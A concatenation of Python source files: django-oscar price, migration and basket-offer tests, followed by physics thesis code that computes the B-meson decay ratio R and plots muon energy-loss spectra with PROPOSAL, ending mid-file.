def test_can_have_tax_set_later(self):
price = Price('USD', D('10.00'))
price.tax = D('2.00')
self.assertEqual(D('12.00'), price.incl_tax)
def test_price_equals_reflexivity(self):
for price in (
Price(currency='USD', excl_tax=D('10.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00')),
):
self.assertEqual(price, price)
def test_price_equals_formats(self):
price1 = Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00'))
price2 = Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00'))
self.assertEqual(price1, price2)
def test_price_equals_currency_matters(self):
price1 = Price(currency='EUR', excl_tax=D('10.00'), tax=D('2.00'))
price2 = Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00'))
self.assertNotEqual(price1, price2)
def test_price_equals_transitivity(self):
prices = (
Price(currency='EUR', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('8.00'))
)
prices_product = product(prices, prices)
for price1, price2 in prices_product:
self.assertEqual(price1 == price2, price2 == price1)
```
#### File: catalogue/migrations/0019_option_required.py
```python
from django.db import migrations, models
def migrate_product_options(apps, schema_editor):
"""
Migrate product Option.type field to required
Set Option.type='text'
"""
Option = apps.get_model('catalogue', 'Option')
for option in Option.objects.all():
if option.type == "Required":
option.required = True
option.type = 'text'
option.save()
class Migration(migrations.Migration):
dependencies = [
('catalogue', '0018_auto_20191220_0920'),
]
operations = [
migrations.AddField(
model_name='option',
name='required',
field=models.BooleanField(default=False, verbose_name='Is option required?'),
),
migrations.RunPython(migrate_product_options, migrations.RunPython.noop),
migrations.AlterField(
model_name='option',
name='type',
field=models.CharField(choices=[('text', 'Text'), ('integer', 'Integer'), ('boolean', 'True / False'), ('float', 'Float'), ('date', 'Date')], default='text', max_length=255, verbose_name='Type'),
),
]
```
#### File: unit/basket/test_offers.py
```python
from decimal import ROUND_HALF_UP
from decimal import Decimal as D
from django.conf import settings
from django.test import RequestFactory, TestCase
from django.urls import reverse
from oscar.core.loading import get_class, get_classes, get_model
from oscar.test.factories import UserFactory
Basket = get_model("basket", "Basket")
Product = get_model("catalogue", "Product")
factory = RequestFactory()
Applicator = get_class("offer.applicator", "Applicator")
Selector, UK = get_classes("partner.strategy", ["Selector", "UK"])
class UKSelector(Selector):
def strategy(self, request=None, user=None, **kwargs):
return UK(request)
def money(amount):
return amount.quantize(D("0.01"), ROUND_HALF_UP)
def get_user_basket(user, request):
editable_baskets = Basket.objects.filter(status__in=["Open", "Saved"])
basket, __ = editable_baskets.get_or_create(owner=user)
basket.strategy = UKSelector().strategy(request=request, user=user)
basket.reset_offer_applications()
if not basket.is_empty:
Applicator().apply(basket, user, request)
request.session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk
request.session.save()
return basket
class OfferTest(TestCase):
fixtures = ["catalogue", "offer"]
def check_general_truths(self, basket):
inverse_tax_multiplier = D(1) / (D(1) + UK.rate)
calculated_total_excl_tax = money(
inverse_tax_multiplier * basket.total_incl_tax
)
self.assertEqual(
calculated_total_excl_tax,
basket.total_excl_tax,
"The total price without tax should conform to the standard "
"formula for calculating tax (as a percentage)",
)
self.assertAlmostEqual(
basket.total_excl_tax_excl_discounts / basket.total_incl_tax_excl_discounts,
basket.total_excl_tax / basket.total_incl_tax,
4,
"The ratio of price with tax and without tax should be the same for the "
"price with and without discounts. If that is not the case people would "
"be able to change the tax they must pay by gaming the discount.",
)
self.assertNotAlmostEqual(
basket.total_excl_tax_excl_discounts - basket.total_excl_tax,
basket.total_incl_tax_excl_discounts - basket.total_incl_tax,
2,
"The discount over the total excluding tax can never be the same as "
"the discount over the total including tax. Otherwise our tax rate"
"would not be linear over the amount.",
)
self.assertEqual(
basket.total_excl_tax + basket.total_tax,
basket.total_incl_tax,
"The tax summation should amount to the total_incl_tax"
)
def test_offer_incl_tax(self):
"The offer should be calculated as if it was declared including tax"
with self.settings(OSCAR_OFFERS_INCL_TAX=True):
self.assertEqual(Basket.objects.count(), 0)
admin = UserFactory()
self.client.force_login(admin)
# throw an item in the basket
basket_add_url = reverse("basket:add", args=(2,))
body = {"quantity": 1}
response = self.client.post(basket_add_url, body)
# throw another item in the basket so the offer activates
basket_add_url = reverse("basket:add", args=(3,))
body = {"quantity": 2}
response = self.client.post(basket_add_url, body)
request = factory.post(basket_add_url, body)
request.user = admin
request.session = self.client.session
basket = get_user_basket(admin, request)
self.assertEqual(response.status_code, 302)
self.assertEqual(Basket.objects.count(), 1)
# now go and check if the offer was applied correctly
self.assertEqual(
basket.total_incl_tax_excl_discounts - basket.total_incl_tax,
D("10.00"),
"The offer should be a flat 10 pound discount on the total "
"including tax",
)
self.assertEqual(
basket.total_discount,
D("10.00"),
"The total discount property should properly reflect the discount"
"applied.",
)
self.check_general_truths(basket)
def test_offer_excl_tax(self):
"The offer should be calculated as if it was declared excluding tax"
with self.settings(OSCAR_OFFERS_INCL_TAX=False):
self.assertEqual(Basket.objects.count(), 0)
admin = UserFactory()
self.client.force_login(admin)
# throw an item in the basket
basket_add_url = reverse("basket:add", args=(2,))
body = {"quantity": 1}
response = self.client.post(basket_add_url, body)
# throw another item in the basket so the offer activates
basket_add_url = reverse("basket:add", args=(3,))
body = {"quantity": 2}
response = self.client.post(basket_add_url, body)
# now go and check if dat offer was handled correctly
request = factory.post(basket_add_url, body)
request.user = admin
request.session = self.client.session
basket = get_user_basket(admin, request)
self.assertEqual(response.status_code, 302)
self.assertEqual(Basket.objects.count(), 1)
# now go and check if the offer was applied correctly
self.assertEqual(
basket.total_excl_tax_excl_discounts - basket.total_excl_tax,
D("10.00"),
"The offer should be a flat 10 pound discount on the total "
"excluding tax",
)
self.assertEqual(
basket.total_discount,
D("10.00"),
"The total discount property should properly reflect the discount"
"applied.",
)
self.check_general_truths(basket)
```
|
{
"source": "Jean1995/Bachelorarbeit",
"score": 2
}
|
#### File: Bachelorarbeit/pycode/R.py
```python
import fit2
from scipy.integrate import quad
import numpy as np
from numpy.linalg import inv
import scipy.constants as const
from numpy import random
from table import (
make_SI,
write,
make_table,
)
from uncertainties import ufloat
from fit2 import N1, N2, m_p, m_0, m_b, m_d, m_e, m_tau, m_mu, m_bottom, m_charm, V_cb, R_exp, m_p_s, m_0_s, m_b_s, m_d_s, m_e_s, m_tau_s, m_mu_s, m_bottom_s, m_charm_s, V_cb_s, R_exp_s
from params import eta, G_f, plot_difwq, R_exp, R_exp_s
a_mc = fit2.a_mc
m_mc = fit2.m_mc
import matplotlib.pyplot as plt
plt.style.use('ggplot')
plt.set_cmap('Set2')
plt.rcParams['figure.figsize'] = (10, 8)
plt.rcParams['font.size'] = 20
plt.rcParams['lines.linewidth'] = 1.5
plt.rcParams['text.usetex'] = True
plt.rcParams['axes.formatter.use_locale'] = True # kommata
plt.rcParams['text.latex.preamble'] = ['\\usepackage[locale=DE,separate-uncertainty=true,per-mode=symbol-or-fraction,]{siunitx} \\DeclareMathSymbol{,}{\mathord}{letters}{"3B}']
plt.rc('font',family='Latin Modern')
### Funktionen
def z(w):
return (np.sqrt(w+1) - np.sqrt(2)) / (np.sqrt(w+1) + np.sqrt(2))
def qq(z):
return m_b**2 + m_d**2 - 2*m_b*m_d * (z**2 + 6*z + 1)/(z-1)**2
def z_from_qq(qq):
w = (m_b**2 + m_d**2 - qq)/(2*m_b*m_d)
return z(w)
def f(z,n,m):
return z**n/(1 - qq(z)/m**2)
z_max = z_from_qq(0)
def f_p(z, a, m_p_tmp):
'''
Zu beachten: Die Reihenfolge der Parameter ist (a_+0, a+1, a+2, ... a+N-1, a_00, a01, a02, ... a0N-1)
'''
tmp = 0
for n in range(N1):
tmp = tmp + a[n] * f(z, n, m_p_tmp)
return tmp
def f_0(z, a, m_0_tmp):
''' '''
tmp = 0
for n in range(N2):
tmp = tmp + a[n+N1] * f(z, n, m_0_tmp)
return tmp
def dif_wq(qq, m_l, a, m_b_tmp, m_d_tmp, m_p_tmp, m_0_tmp):
#beachte die gekürzten Faktoren: (eta^2 G_f^2 V_cb m_b)/(192 pi^3)
r = m_d_tmp/m_b_tmp
lambd = (qq - m_b_tmp**2 - m_d_tmp**2)**2 - 4*m_b_tmp**2*m_d_tmp**2
c_plus = lambd/m_b_tmp**4 * (1 + m_l**2/(2*qq))
c_null = (1-r**2)**2 * 3*m_l**2/(2*qq)
return np.sqrt(lambd) * (1 - m_l**2/qq)**2 * (c_plus * f_p(z_from_qq(qq), a, m_p_tmp)**2 + c_null * f_0(z_from_qq(qq), a, m_0_tmp)**2 )
def dif_wq_complete(qq, m_l, a, m_b_tmp, m_d_tmp, V_cb_tmp, m_p_tmp, m_0_tmp):
r = m_d_tmp/m_b_tmp
lambd = (qq - m_b_tmp**2 - m_d_tmp**2)**2 - 4*m_b_tmp**2*m_d_tmp**2
c_plus = lambd/m_b_tmp**4 * (1 + m_l**2/(2*qq))
c_null = (1-r**2)**2 * 3*m_l**2/(2*qq)
vorfaktor = eta**2 * G_f**2 * V_cb_tmp**2 * m_b_tmp * np.sqrt(lambd) * 1/(192*np.pi**3) * (1 - m_l**2 / qq)**2
return vorfaktor * (c_plus * f_p(z_from_qq(qq), a, m_p_tmp)**2 + c_null * f_0(z_from_qq(qq), a, m_0_tmp)**2 )
###
R_values = np.array([]) # leeres array für Werte
for a, m in zip(a_mc, m_mc):
tot_wq_e = quad(dif_wq, m[4]**2, (m[2]-m[3])**2, args=(m[4], a, m[2], m[3], m[0], m[1]))[0]
tot_wq_tau = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[5], a, m[2], m[3], m[0], m[1]))[0]
tot_wq_mu = quad(dif_wq, m[6]**2, (m[2]-m[3])**2, args=(m[6], a, m[2], m[3], m[0], m[1]))[0]
#print(tot_wq_e)
R_values = np.append(R_values, 2*tot_wq_tau/(tot_wq_e + tot_wq_mu))
R_error = np.std(R_values)
R_mean = np.mean(R_values)
write('R_si' + str(N1) + str(N2) + '.tex', make_SI(ufloat(R_mean,R_error), r'', figures=2))
print("R =",R_mean, "+-", R_error)
if N1==3 and N2==3: # ugly workaround
write('R_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean, R_error)]], [2]))
else:
write('R_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean, R_error)]], [1]))
# Abweichung R_exp zu R_mean
write('R_abweichung_' + str(N1) + str(N2) +'.tex', make_SI(abs(R_exp - R_mean)/R_exp_s, r'', figures=1))
# R-Schlange: Integriere nur von (m_b-m_d)**2 bis zu m_tau^2, um die größer werdenden Fehler des dif. WQ zu beheben
#R_values_schlange = np.array([])
#
#for a, m in zip(a_mc, m_mc):
# tot_wq_e_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[4], a, m[2], m[3], m[0], m[1]))[0]
# tot_wq_tau_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[5], a, m[2], m[3], m[0], m[1]))[0]
# tot_wq_mu_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[6], a, m[2], m[3], m[0], m[1]))[0]
# #print(tot_wq_e)
# R_values_schlange = np.append(R_values_schlange, 2*tot_wq_tau_schlange/(tot_wq_e_schlange + tot_wq_mu_schlange))
#
#R_error_schlange = np.std(R_values_schlange)
#R_mean_schlange = np.mean(R_values_schlange)
#
#print("R~", R_mean_schlange, "+-", R_error_schlange)
#write('Rschlange_si' + str(N1) + str(N2) + '.tex', make_SI(ufloat(R_mean_schlange,R_error_schlange), r'', figures=2))
#write('Rschlange_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean_schlange, R_error_schlange)]], [1]))
#
#### Differentieller Wirkungsquerschnitt Elektronen / Tauonen
#
if plot_difwq != 0:
qq_plot_tau = np.linspace(m_tau**2, (m_b-m_d)**2 , 300)
qq_plot_e = np.linspace(m_e**2, (m_b-m_d)**2 , 300)
qq_plot_mu = np.linspace(m_mu**2, (m_b-m_d)**2 , 300)
dif_wq_val_e = np.array([])
dif_wq_val_e_up = np.array([])
dif_wq_val_e_down = np.array([])
dif_wq_val_tau = np.array([])
dif_wq_val_tau_up = np.array([])
dif_wq_val_tau_down = np.array([])
dif_wq_val_mu = np.array([])
dif_wq_val_mu_up = np.array([])
dif_wq_val_mu_down = np.array([])
for qq_tmp in qq_plot_e:
tmp_e = np.array([])
for a, m in zip(a_mc, m_mc):
tmp_e = np.append(tmp_e, dif_wq_complete(qq_tmp, m[4], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_e = np.mean(tmp_e)
tmp_std_e = np.std(tmp_e)
dif_wq_val_e = np.append(dif_wq_val_e, tmp_mean_e)
dif_wq_val_e_up = np.append(dif_wq_val_e_up, tmp_mean_e + tmp_std_e)
dif_wq_val_e_down = np.append(dif_wq_val_e_down, tmp_mean_e - tmp_std_e)
for qq_tmp in qq_plot_tau:
tmp_tau = np.array([])
for a, m in zip(a_mc,m_mc):
tmp_tau = np.append(tmp_tau, dif_wq_complete(qq_tmp, m[5], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_tau = np.mean(tmp_tau)
tmp_std_tau = np.std(tmp_tau)
dif_wq_val_tau = np.append(dif_wq_val_tau, tmp_mean_tau)
dif_wq_val_tau_up = np.append(dif_wq_val_tau_up, tmp_mean_tau + tmp_std_tau)
dif_wq_val_tau_down = np.append(dif_wq_val_tau_down, tmp_mean_tau - tmp_std_tau)
for qq_tmp in qq_plot_mu:
tmp_mu = np.array([])
for a, m in zip(a_mc, m_mc):
tmp_mu = np.append(tmp_mu, dif_wq_complete(qq_tmp, m[6], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_mu = np.mean(tmp_mu)
tmp_std_mu = np.std(tmp_mu)
dif_wq_val_mu = np.append(dif_wq_val_mu, tmp_mean_mu)
dif_wq_val_mu_up = np.append(dif_wq_val_mu_up, tmp_mean_mu + tmp_std_mu)
dif_wq_val_mu_down = np.append(dif_wq_val_mu_down, tmp_mean_mu - tmp_std_mu)
red = 1/(10**(-15) )#* 10**9 * const.eV)
plt.plot(z_from_qq(qq_plot_e) ,dif_wq_val_e*red, label=r'Dif. Zerfallsbreite, $l = e$', color='b')
plt.fill_between(z_from_qq(qq_plot_e), dif_wq_val_e_up*red, dif_wq_val_e_down*red, interpolate=True, alpha=0.3, color='b',linewidth=0.0)
plt.plot(z_from_qq(qq_plot_tau) ,dif_wq_val_tau*red, label=r'Dif. Zerfallsbreite, $l = \tau$', color='r')
plt.fill_between(z_from_qq(qq_plot_tau), dif_wq_val_tau_up*red, dif_wq_val_tau_down*red, interpolate=True, alpha=0.3, color='r',linewidth=0.0)
plt.plot(z_from_qq(qq_plot_mu) ,dif_wq_val_mu*red, label=r'Dif. Zerfallsbreite, $l = \mu$', color='g')
plt.fill_between(z_from_qq(qq_plot_mu), dif_wq_val_mu_up*red, dif_wq_val_mu_down*red, interpolate=True, alpha=0.3, color='g',linewidth=0.0)
plt.ylabel(r'$\frac{\mathrm{d} \Gamma}{\mathrm{d} q^2} \left(\overline{B} \to D l \overline{\nu}_l \right) \,/\, \left( \num{e-15} \si{\giga \electronvolt\tothe{-1}} \right)$')
plt.xlabel(r'$z$')
plt.legend(loc='best', prop={'size':20})
plt.tight_layout()
plt.savefig('plot_diff_wq' + str(N1) + str(N2) + '.pdf') #fancy
plt.clf()
np.savetxt('difwqges_'+str(N1)+str(N2)+'.txt', np.column_stack([dif_wq_val_e, dif_wq_val_tau, dif_wq_val_mu]))
```
|
{
"source": "Jean1995/Masterarbeit",
"score": 2
}
|
#### File: Masterarbeit/Plots/dEdx_ionization.py
```python
import pyPROPOSAL as pp
import pyPROPOSAL.parametrization as parametrization
import matplotlibconfig as conf
try:
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
except ImportError:
raise ImportError("Matplotlib not installed!")
try:
import numpy as np
except ImportError:
raise ImportError(
"Numpy not installed! Needed to calculate the detector cylinder"
)
import math
if __name__ == "__main__":
electron = pp.particle.EMinusDef.get()
positron = pp.particle.EPlusDef.get()
medium = pp.medium.Air(1.0) # With densitiy correction
cuts = pp.EnergyCutSettings(-1, -1) # ecut, vcut
dEdx_list = []
energy = np.logspace(-1, 12, 1000)
energy = energy[energy > 0.52]
interpolation_def = pp.InterpolationDef()
# =========================================================
# Constructor args for parametrizations
#
# - particle
# - medium
# - cut
# - multiplier
# - lpm effect
# - interpolation definition
# =========================================================
param_defs_electron = [electron, medium, cuts, 1.]
param_defs_positron = [electron, medium, cuts, 1.]
params = [
pp.parametrization.ionization.BetheBlochRossi(*param_defs_electron),
pp.parametrization.ionization.BetheBlochRossiLO(*param_defs_electron),
pp.parametrization.ionization.BergerSeltzerMoller(*param_defs_electron),
pp.parametrization.ionization.BergerSeltzerBhabha(*param_defs_positron)
]
# =========================================================
# Create x sections out of their parametrizations
# =========================================================
crosssections = []
crosssections.append(pp.crosssection.IonizIntegral(
params[0]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[1]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[2]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[3]
))
# =========================================================
# Calculate DE/dx at the given energies
# =========================================================
for cross in crosssections:
dEdx = []
for E in energy:
dEdx.append(cross.calculate_dEdx(E))
dEdx_list.append(dEdx)
# =========================================================
# Plot
# =========================================================
plt.rcParams.update(conf.params)
fig = plt.figure(figsize=(conf.width,4))
gs = mpl.gridspec.GridSpec(2, 1, height_ratios=[4, 3], hspace=0.05)
ax = fig.add_subplot(gs[0])
labels = [r'Bethe with NLO correction', r'Bethe without NLO correction', r'Berger-Seltzer (M{\o}ller)', r'Berger-Seltzer (Bhabha)']
colors = ['green', 'red', 'blue', 'orange']
for dEdx, param, _label, _color in zip(dEdx_list, params, labels, colors):
ax.semilogx(
energy,
dEdx,
linestyle='-',
label=_label,
color = _color
)
ax.set_ylabel(r'$\left\langle\frac{\mathrm{d}E}{\mathrm{d}X}\right\rangle \,\left/\, \left( \rm{MeV} \cdot \rm{g}^{-1} \rm{cm}^2 \right) \right. $')
ax.xaxis.grid(conf.grid_conf)
ax.yaxis.grid(conf.grid_conf)
#ax.set_yscale('log')
ax.legend(loc='best')
plt.setp(ax.get_xticklabels(), visible=False)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False
) # labels along the bottom edge are off
# ====[ ratio ]============================================
ax = fig.add_subplot(gs[1], sharex=ax)
start = 0
ax.semilogx(
energy[start:],
np.array(dEdx_list)[2][start:] / np.array(dEdx_list[1][start:]),
linestyle='-',
label=r'Berger-Seltzer (M{\o}ller) / Bethe',
color = colors[2]
)
ax.semilogx(
energy[start:],
np.array(dEdx_list)[3][start:] / np.array(dEdx_list[1][start:]),
linestyle='-',
label=r'Berger-Seltzer (Bhabha) / Bethe',
color = colors[3]
)
ax.xaxis.grid(conf.grid_conf)
ax.yaxis.grid(conf.grid_conf)
ax.legend(loc='best')
ax.set_xlabel(r'$E$ / MeV')
ax.set_ylabel(r'Ratio')
plt.tight_layout()
fig.savefig('build/dEdx_ionization.pdf',bbox_inches='tight')
plt.show()
```
#### File: Masterarbeit/Plots/mupair_rho.py
```python
import numpy as np
import pyPROPOSAL as pp
import pyPROPOSAL.parametrization as parametrization
from matplotlibconfig import *
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#define defaults and parametrization
mu = pp.particle.MuMinusDef.get()
medium = pp.medium.Ice(1.0)
cuts = pp.EnergyCutSettings(-1, -1)
interpolation_def = pp.InterpolationDef()
param_defs_mupair = [mu, medium, cuts, 1.0, True, interpolation_def]
plt.rcParams.update(params)
plt.figure(figsize=(width, 3.5))
pp.RandomGenerator.get().set_seed(1234)
param = parametrization.mupairproduction.KelnerKokoulinPetrukhinInterpolant(*param_defs_mupair)
v_list = [0.1, 0.5, 0.8]
colors = ['tab:blue', 'tab:orange', 'tab:green']
E_list = [1e4, 1e9]
linestyles = ['--', '-']
statistics = int(1e6)
for E_init, linestyle in zip(E_list, linestyles):
rho_list = []
energies = np.ones(statistics)*E_init
for i, v in enumerate(v_list):
rho_list.append([])
for E in energies:
rho_list[i].append(param.Calculaterho(E, v, np.random.rand(), np.random.rand()))
for i, (v, c) in enumerate(zip(v_list, colors)):
plt.hist(np.abs(rho_list[i]), color=c, bins=40, histtype='step', zorder=3, ls=linestyle)
plt.xlabel(r'$\lvert \rho \rvert$')
plt.ylabel(r'Frequency',)
# automatic legend
plt.legend(loc='upper left')
custom_lines = []
legends = []
for v, c in zip(v_list, colors):
custom_lines.append(Line2D([0], [0], color=c, lw=2))
legends.append(r'$v = {:.2g}$'.format(v))
plt.legend(custom_lines, legends, loc='upper left')
plt.grid(grid_conf)
plt.tight_layout()
plt.savefig('build/mupair_rho.pdf',bbox_inches='tight')
```
#### File: Masterarbeit/Plots/spectrum_mupair.py
```python
from __future__ import division
import sys
import os
import pyPROPOSAL as pp
import math
import time
import datetime
from matplotlibconfig import *
try:
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
from matplotlib.ticker import AutoMinorLocator
from mpl_toolkits.axes_grid1 import make_axes_locatable
except ImportError:
print("Matplotlib not installed!")
try:
import numpy as np
except ImportError:
print("Numpy not installed!")
try:
from sklearn.utils import check_random_state
except ImportError:
print("SkLearn not installed!")
class ProgressBar(object):
def __init__(self, loops, bar_lenght=50, start=0, **keywords):
self._bar_lenght = bar_lenght
self._bar = []
self._loops = loops
self._start = float(start)
self._current_loop = start
self._started_process = False
self._start_time = None
self._pacman = False
self._status = ""
self._text = "\rPercent: [{0}] {1}% Time: {2} Iteration: {3}/{4} {5}"
self._bar_full = "="
self._bar_empty = " "
for key, value in keywords.items():
if key is "pacman":
assert type(value) is bool
self._pacman = value
if self._pacman:
self._bar_full = "-"
self._bar_empty = "o"
current = self._bar_empty
for i in range(self._bar_lenght):
if current is self._bar_empty:
current = " "
self._bar.append(current)
else:
current = self._bar_empty
self._bar.append(current)
else:
for i in range(self._bar_lenght):
self._bar.append(self._bar_empty)
self._current_pac_state = "C"
self._current_pac_block = 0
def reset(self):
self._current_loop = self._start
self._status = ""
self._started_process = False
def start(self):
self._started_process = True
self._start_time = time.time()
def update(self):
if self._started_process is False:
print("Pleas start ProgressBar before updating it!")
return
self._current_loop += 1.0
progress = self._current_loop / self._loops
if progress >= 1.0:
self._status = "Done...\n"
if self._pacman:
block = int((self._bar_lenght - 1) * progress)
if self._current_pac_block < block:
self._current_pac_block = block
if self._current_pac_state is "c":
self._current_pac_state = "C"
else:
self._current_pac_state = "c"
else:
pass
self._bar[block] = '\033[1m' + "\033[93m" + \
self._current_pac_state + '\033[0m'
self._bar[:block] = block * [self._bar_full]
else:
block = int(self._bar_lenght * progress)
self._bar[:block] = block * [self._bar_full]
text = self._text.format(
"".join(self._bar),
progress*100,
str(datetime.timedelta(seconds=(time.time() - self._start_time))),
int(self._current_loop),
self._loops,
self._status
)
sys.stdout.write(text)
sys.stdout.flush()
def propagate_muons():
mu_def = pp.particle.MuMinusDef.get()
geometry = pp.geometry.Sphere(pp.Vector3D(), 1.e20, 0.0)
ecut = 500
vcut = -1
sector_def = pp.SectorDefinition()
sector_def.cut_settings = pp.EnergyCutSettings(ecut, vcut)
sector_def.medium = pp.medium.Ice(1.0)
sector_def.geometry = geometry
sector_def.scattering_model = pp.scattering.ScatteringModel.NoScattering
sector_def.crosssection_defs.brems_def.lpm_effect = True
sector_def.crosssection_defs.epair_def.lpm_effect = True
detector = geometry
interpolation_def = pp.InterpolationDef()
interpolation_def.path_to_tables = "tables/"
#initialize propagator without mupairproduction
prop_nomupair = pp.Propagator(mu_def, [sector_def], detector, interpolation_def)
#initialize propagator with mupairproduction
sector_def.crosssection_defs.mupair_def.parametrization = pp.parametrization.mupairproduction.MupairParametrization.KelnerKokoulinPetrukhin
sector_def.crosssection_defs.mupair_def.particle_output = False
prop = pp.Propagator(mu_def, [sector_def], detector, interpolation_def)
# for rho sampling
param_defs_mupair = [mu_def, sector_def.medium, sector_def.cut_settings, 1.0, True, interpolation_def]
param_mupair = pp.parametrization.mupairproduction.KelnerKokoulinPetrukhinInterpolant(*param_defs_mupair)
statistics_log = 5
statistics = int(10**statistics_log)
propagation_length = 1e20 # cm
E_log = 8.0
pp.RandomGenerator.get().set_seed(1234)
### PRIMARY MUON PROPAGATION ###
muon_energies = np.ones(statistics)*10**E_log
epair_secondary_energy = []
brems_secondary_energy = []
ioniz_secondary_energy = []
photo_secondary_energy = []
mpair_secondary_energy = []
mpair_primary_energy = []
print("Propagate primary muons...")
progress = ProgressBar(statistics, pacman=True)
progress.start()
for mu_energy in muon_energies:
progress.update()
prop.particle.position = pp.Vector3D(0, 0, 0)
prop.particle.direction = pp.Vector3D(0, 0, -1)
prop.particle.propagated_distance = 0
prop.particle.energy = mu_energy
secondarys = prop.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
mpair_secondary_energy.append(sec_energy)
mpair_primary_energy.append(sec.parent_particle_energy)
#statistics:
num_all = len(brems_secondary_energy) + len(epair_secondary_energy) + len(photo_secondary_energy) + len(ioniz_secondary_energy) + len(mpair_secondary_energy)
ene_all = sum(brems_secondary_energy) + sum(epair_secondary_energy) + sum(photo_secondary_energy) + sum(ioniz_secondary_energy) + sum(mpair_secondary_energy)
print("Number:")
print("Brems: ", len(brems_secondary_energy), len(brems_secondary_energy)/num_all)
print("Epair: ", len(epair_secondary_energy), len(epair_secondary_energy)/num_all)
print("photo: ", len(photo_secondary_energy), len(photo_secondary_energy)/num_all)
print("Ioniz: ", len(ioniz_secondary_energy), len(ioniz_secondary_energy)/num_all)
print("MPair: ", len(mpair_secondary_energy), len(mpair_secondary_energy)/num_all)
print("Energies:")
print("Brems ", sum(brems_secondary_energy), sum(brems_secondary_energy)/ene_all)
print("Epair: ", sum(epair_secondary_energy), sum(epair_secondary_energy)/ene_all)
print("photo: ", sum(photo_secondary_energy), sum(photo_secondary_energy)/ene_all)
print("Ioniz: ", sum(ioniz_secondary_energy), sum(ioniz_secondary_energy)/ene_all)
print("MPair: ", sum(mpair_secondary_energy), sum(mpair_secondary_energy)/ene_all)
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy,brems_secondary_energy,photo_secondary_energy,epair_secondary_energy,mpair_secondary_energy)))), E_log, 100)
ax_all = fig_all.add_subplot(111)
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy,
np.concatenate((
ioniz_secondary_energy,
brems_secondary_energy,
photo_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy)
)
],
histtype='step',
log=True,
bins=x_space,
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', r'$\mu$ pair production', 'Sum'],
color = ['C3', 'C2', 'C1', 'C0', 'C4', 'C7'],
zorder = 3
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair.pdf",bbox_inches='tight')
plt.clf()
epair_old = epair_secondary_energy
brems_old = brems_secondary_energy
ioniz_old = ioniz_secondary_energy
photo_old = photo_secondary_energy
mpair_old = mpair_secondary_energy
### SECONDARY MUON PROPAGATION ###
secondary_muon_energy = []
for E, nu in zip(mpair_primary_energy, mpair_secondary_energy):
rho = param_mupair.Calculaterho(E, nu/E, np.random.rand(), np.random.rand())
secondary_muon_energy.append( 0.5 * nu * (1. + rho) )
secondary_muon_energy.append( 0.5 * nu * (1. - rho) )
epair_secondary_energy = []
brems_secondary_energy = []
ioniz_secondary_energy = []
photo_secondary_energy = []
mpair_secondary_energy = []
print("Propagate secondary muons...")
progress = ProgressBar(len(secondary_muon_energy), pacman=True)
progress.start()
for mu_energy in secondary_muon_energy:
progress.update()
prop.particle.position = pp.Vector3D(0, 0, 0)
prop.particle.direction = pp.Vector3D(0, 0, -1)
prop.particle.propagated_distance = 0
prop.particle.energy = mu_energy
secondarys = prop.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
mpair_secondary_energy.append(sec_energy)
print("Number:")
print("Brems: ", len(brems_secondary_energy), len(brems_secondary_energy)/num_all)
print("Epair: ", len(epair_secondary_energy), len(epair_secondary_energy)/num_all)
print("photo: ", len(photo_secondary_energy), len(photo_secondary_energy)/num_all)
print("Ioniz: ", len(ioniz_secondary_energy), len(ioniz_secondary_energy)/num_all)
